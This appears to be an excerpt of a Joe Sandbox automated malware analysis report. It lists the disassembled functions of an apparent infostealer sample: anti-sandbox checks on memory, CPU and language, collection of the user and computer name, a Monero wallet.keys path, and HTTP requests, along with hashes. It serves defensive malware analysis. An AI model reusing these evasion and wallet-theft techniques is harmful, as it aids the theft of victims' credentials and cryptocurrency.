                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 6ef9b4374f7292cb361970c82a30fd171d40d3cb6a142377bd80d9ab4cb22276
                          • Instruction ID: e910e64d94162038da0e00db0db0c115ac1eea3bc9bba0c29c5c4d95210ff092
                          • Opcode Fuzzy Hash: 6ef9b4374f7292cb361970c82a30fd171d40d3cb6a142377bd80d9ab4cb22276
                          • Instruction Fuzzy Hash: 90516174B08209EFDB15DFA4E944AEEB7BDEF48344F104058E902AB241E770E954CB61
                          Function 00036C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2248), ref: 00039BF1
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2368), ref: 00039C0A
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2488), ref: 00039C22
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2260), ref: 00039C3A
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2338), ref: 00039C53
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD9098), ref: 00039C6B
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FC5A70), ref: 00039C83
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FC5790), ref: 00039C9C
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2410), ref: 00039CB4
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD22D8), ref: 00039CCC
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2308), ref: 00039CE5
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2440), ref: 00039CFD
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FC5950), ref: 00039D15
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD23B0), ref: 00039D2E
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 000211D0: ExitProcess.KERNEL32 ref: 00021211
                            • Part of subcall function 00021160: GetSystemInfo.KERNEL32(?), ref: 0002116A
                            • Part of subcall function 00021160: ExitProcess.KERNEL32 ref: 0002117E
                            • Part of subcall function 00021110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0002112B
                            • Part of subcall function 00021110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00021132
                            • Part of subcall function 00021110: ExitProcess.KERNEL32 ref: 00021143
                            • Part of subcall function 00021220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0002123E
                            • Part of subcall function 00021220: __aulldiv.LIBCMT ref: 00021258
                            • Part of subcall function 00021220: __aulldiv.LIBCMT ref: 00021266
                            • Part of subcall function 00021220: ExitProcess.KERNEL32 ref: 00021294
                            • Part of subcall function 00036A10: GetUserDefaultLangID.KERNEL32 ref: 00036A14
                            • Part of subcall function 00021190: ExitProcess.KERNEL32 ref: 000211C6
                            • Part of subcall function 000379E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000211B7), ref: 00037A10
                            • Part of subcall function 000379E0: RtlAllocateHeap.NTDLL(00000000), ref: 00037A17
                            • Part of subcall function 000379E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00037A2F
                            • Part of subcall function 00037A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037AA0
                            • Part of subcall function 00037A70: RtlAllocateHeap.NTDLL(00000000), ref: 00037AA7
                            • Part of subcall function 00037A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00037ABF
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036D6A
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00036D88
                          • CloseHandle.KERNEL32(00000000), ref: 00036D99
                          • Sleep.KERNEL32(00001770), ref: 00036DA4
                          • CloseHandle.KERNEL32(?,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036DBA
                          • ExitProcess.KERNEL32 ref: 00036DC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: fd09d1808cfc8dfb5d745ea9fdc3aa288b621e04cd562d91413738e458c5c346
                          • Instruction ID: ef1ece51562e68f43b8aa66f88b486863112477c02bab5a7381de37ce4028f7a
                          • Opcode Fuzzy Hash: fd09d1808cfc8dfb5d745ea9fdc3aa288b621e04cd562d91413738e458c5c346
                          • Instruction Fuzzy Hash: D1310B71A14208ABCB16FBF0EC66AFEB37DAF15350F104928F15666193DF706905CA62
                          Function 00021220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 21220-21247 call 38b40 GlobalMemoryStatusEx 1439 21273-2127a 1436->1439 1440 21249-21271 call 3dd30 * 2 1436->1440 1442 21281-21285 1439->1442 1440->1442 1444 21287 1442->1444 1445 2129a-2129d 1442->1445 1447 21292-21294 ExitProcess 1444->1447 1448 21289-21290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0002123E
                          • __aulldiv.LIBCMT ref: 00021258
                          • __aulldiv.LIBCMT ref: 00021266
                          • ExitProcess.KERNEL32 ref: 00021294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: 67331a0191768b18aa1de73386582232b97fe63734b5acd7a822913acc4b07e8
                          • Instruction ID: 8e27569f3fa0a6256f21e15774b0edefb1f2c703527d50747c9d03afcf285125
                          • Opcode Fuzzy Hash: 67331a0191768b18aa1de73386582232b97fe63734b5acd7a822913acc4b07e8
                          • Instruction Fuzzy Hash: 74016DB0D40318FAEB10DFE0EC4ABEEBBB8AB24705F208459F604B61C1C7B455598759
                          Function 00036D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 36d93 1451 36daa 1450->1451 1453 36d5a-36d77 call 3ade0 OpenEventA 1451->1453 1454 36dac-36dc2 call 36bc0 call 35d60 CloseHandle ExitProcess 1451->1454 1460 36d95-36da4 CloseHandle Sleep 1453->1460 1461 36d79-36d91 call 3ade0 CreateEventA 1453->1461 1460->1451 1461->1454
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036D6A
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00036D88
                          • CloseHandle.KERNEL32(00000000), ref: 00036D99
                          • Sleep.KERNEL32(00001770), ref: 00036DA4
                          • CloseHandle.KERNEL32(?,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036DBA
                          • ExitProcess.KERNEL32 ref: 00036DC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: a0dd55940baabc4225e0509f6bd84e1d4ee0480c45e0d890eec5575834c3e724
                          • Instruction ID: af10541fbc844ee8abdc5e5156691941c978ef3b61ca4a3d15cff02e2ba97037
                          • Opcode Fuzzy Hash: a0dd55940baabc4225e0509f6bd84e1d4ee0480c45e0d890eec5575834c3e724
                          • Instruction Fuzzy Hash: 34F05E30A48209BBEB52ABA0EC0ABFE777CAF05751F108525F516A5191CBB15504CA51
                          Function 00024800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 778957888e079d9de93bdcf4f615b66fda5b9d5e0be3d52d690c0378f6b5c174
                          • Instruction ID: 6c47d61d1204ba89e5578510ae2d70ec5e8c5a17bcc4b94a58d2f8fd6ea4270a
                          • Opcode Fuzzy Hash: 778957888e079d9de93bdcf4f615b66fda5b9d5e0be3d52d690c0378f6b5c174
                          • Instruction Fuzzy Hash: 58214FB1E00208ABDF14DFA4E845ADE7B78FB45360F108625F929A72C1DB706A05CF91
                          Function 00035440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 000262D0: InternetOpenA.WININET(00040DFF,00000001,00000000,00000000,00000000), ref: 00026331
                            • Part of subcall function 000262D0: StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026353
                            • Part of subcall function 000262D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026385
                            • Part of subcall function 000262D0: HttpOpenRequestA.WININET(00000000,GET,?,00FDE068,00000000,00000000,00400100,00000000), ref: 000263D5
                            • Part of subcall function 000262D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0002640F
                            • Part of subcall function 000262D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026421
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035478
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: f41e70fde06ac24a4a09220d4c4c2567c1e2e004239449db7bc054c84d4220a3
                          • Instruction ID: 2bb1416aa90491acb698f31c853a274a5dbab2eb2c7d5f047062a1e87d6a4e47
                          • Opcode Fuzzy Hash: f41e70fde06ac24a4a09220d4c4c2567c1e2e004239449db7bc054c84d4220a3
                          • Instruction Fuzzy Hash: CF111271A00508ABDB15FFA4EDA2EED733DAF51340F404568F95A5B4A3EF30AB04CA52
                          Function 00037A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037AA0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037AA7
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00037ABF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: ef82938d858a045e34e8ed6a010bff2d68a015746c9ad3f2467bd8d1c505b158
                          • Instruction ID: 9bac33916c0b7f46909424532933fff15592c2906ba2b57c4e2079f115c44e75
                          • Opcode Fuzzy Hash: ef82938d858a045e34e8ed6a010bff2d68a015746c9ad3f2467bd8d1c505b158
                          • Instruction Fuzzy Hash: CD0186B1908649ABC710DF98ED45BAEBBBCFB44761F10012AF605E2680D7745A00CBA1
                          Function 00021110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0002112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00021132
                          • ExitProcess.KERNEL32 ref: 00021143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: f6b971c759d2dba6b3346bf08467ff0fbd6020d184e974ac3c8e1019bf723349
                          • Instruction ID: 797e42ba3f4eb97071cf734be5eb61c4717b7d1a85b4ceb92eab294714cf9d84
                          • Opcode Fuzzy Hash: f6b971c759d2dba6b3346bf08467ff0fbd6020d184e974ac3c8e1019bf723349
                          • Instruction Fuzzy Hash: 66E0E670949308FBE7505B90BD0EB9D76689B04B55F100155F709761D0C6B525509659
                          Function 000210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000210B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000210F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: b22dfac2c8de0097170ad5ea0ddc3d39ca00ba280b87feeab2eb2ea42ae27f7c
                          • Instruction ID: d0f2b79c75aed477cae07874f25c98f2f579ecd2f64e12f18f91290f02a22195
                          • Opcode Fuzzy Hash: b22dfac2c8de0097170ad5ea0ddc3d39ca00ba280b87feeab2eb2ea42ae27f7c
                          • Instruction Fuzzy Hash: 08F0E2B1641318BBE7149AA4AC99FAFB7DCE705B54F300858F904E3280D672AE00CBA0
                          Function 00021190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00037A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037AA0
                            • Part of subcall function 00037A70: RtlAllocateHeap.NTDLL(00000000), ref: 00037AA7
